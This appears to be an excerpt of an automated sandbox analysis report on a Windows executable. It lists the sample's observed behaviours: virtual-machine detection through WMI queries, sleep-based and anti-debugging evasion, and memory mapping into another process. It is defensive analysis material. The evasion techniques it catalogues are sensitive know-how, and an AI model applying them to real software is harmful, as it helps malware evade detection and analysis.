Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_0043372C

0_2_0043372C

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

0_2_004574D0

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Window / User API: threadDelayed 774

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_0043372C

0_2_0043372C

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -89673s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 5968	Thread sleep count: 774 > 30	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -56782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -79923s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -50782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -48282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -44782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -43282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -41282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -38282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -56673s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -36282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -34782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -51423s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -31282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -40923s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -35673s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -30423s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -59594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -59374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -58688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -57594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -86061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -84750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -56094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -55874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -55188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -54782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -53874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -80532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -80250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -53000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -52782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -78891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -52374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -52000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -51688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -77250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -76923s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -51094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -50874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -50594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -50188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -49782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -49500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -49282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -73641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -73311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -48688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -48500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -47782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -47094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -46874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -46688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -69750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -45594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -68061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -44688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -66750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -44282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -44094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -42594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -42374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -41188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -40500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -36688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -36500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -35594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -35374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -34500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -33500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -33188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -32094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -31874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -58000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -57782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -43188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -43000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -42094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -41874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -41000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -40782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -39688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -39500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -38594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -38374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -37500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -37282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -35094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -34874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -33782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -32688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -32500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -31594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -31374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -30500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe TID: 1476	Thread sleep time: -30282s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_004703B0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004703CBh

0_2_004703B0

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00408938 FindFirstFileA,GetLastError,		0_2_00408938
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		0_2_00405AC0

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_00420B24 GetSystemInfo,

0_2_00420B24

Source: mcsrXx9lfD.exe, 00000001.00000002.950384937.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mcsrXx9lfD.exe, 00000001.00000003.902505301.00000000008EF000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: mcsrXx9lfD.exe, 00000001.00000002.950384937.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: mcsrXx9lfD.exe, 00000001.00000002.950384937.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mcsrXx9lfD.exe, 00000001.00000002.950384937.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process queried: DebugFlags			Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process queried: DebugObjectHandle			Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 1_2_00AFE800 LdrInitializeThunk,

1_2_00AFE800

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 1_2_0043F6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_0043F6F3

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

0_2_00443C20

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00443412 mov eax, dword ptr fs:[00000030h]		1_2_00443412
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_004434D0 mov eax, dword ptr fs:[00000030h]		1_2_004434D0

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0043F6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0043F6F3
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0043E746 SetUnhandledExceptionFilter,	1_2_0043E746
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00441D7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00441D7F
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0043FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0043FBB5

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Section loaded: unknown target: C:\Users\user\Desktop\mcsrXx9lfD.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Process created: C:\Users\user\Desktop\mcsrXx9lfD.exe 'C:\Users\user\Desktop\mcsrXx9lfD.exe'

Jump to behavior

Source: mcsrXx9lfD.exe, 00000001.00000002.947333210.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: mcsrXx9lfD.exe, 00000001.00000002.947333210.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: mcsrXx9lfD.exe, 00000001.00000002.947333210.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: mcsrXx9lfD.exe, 00000001.00000002.947333210.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405C78
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: GetLocaleInfoA,GetACP,	0_2_0040ACF0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: GetLocaleInfoA,	0_2_00409940
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: GetLocaleInfoA,	0_2_0040998C
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405D84
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: GetLocaleInfoA,	1_2_00442A4A

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Users\user\Desktop\mcsrXx9lfD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
